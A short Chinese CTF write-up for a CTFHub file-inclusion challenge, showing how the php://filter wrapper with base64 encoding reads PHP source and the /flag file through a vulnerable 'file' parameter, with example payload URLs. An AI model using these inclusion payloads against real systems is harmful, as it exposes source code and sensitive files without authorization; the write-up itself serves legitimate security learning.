文件包含————ctfhub之读取源文件

php://filter

php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。

PHP.ini:

php://filter在双off的情况下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on文件包含————ctfhub之读取源文件
举例:
http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=./cmd.php

CTFHUB之读取源代码

文件包含————ctfhub之读取源文件

告诉flag的位置在/flag里,接下来就直接用php://filter提取就可以了。

构造pyload:

http://challenge-640f4eefc4df2119.sandbox.ctfhub.com:10080/?file=php://filter/read=convert.base64-encode/resource=/flag

得到一串base64代码
文件包含————ctfhub之读取源文件
解码即可的flag
文件包含————ctfhub之读取源文件

上一篇:Hackergame 2021 - XFF伪造 [FLAG助力大红包]


下一篇:使用ueditor实现多图片上传案例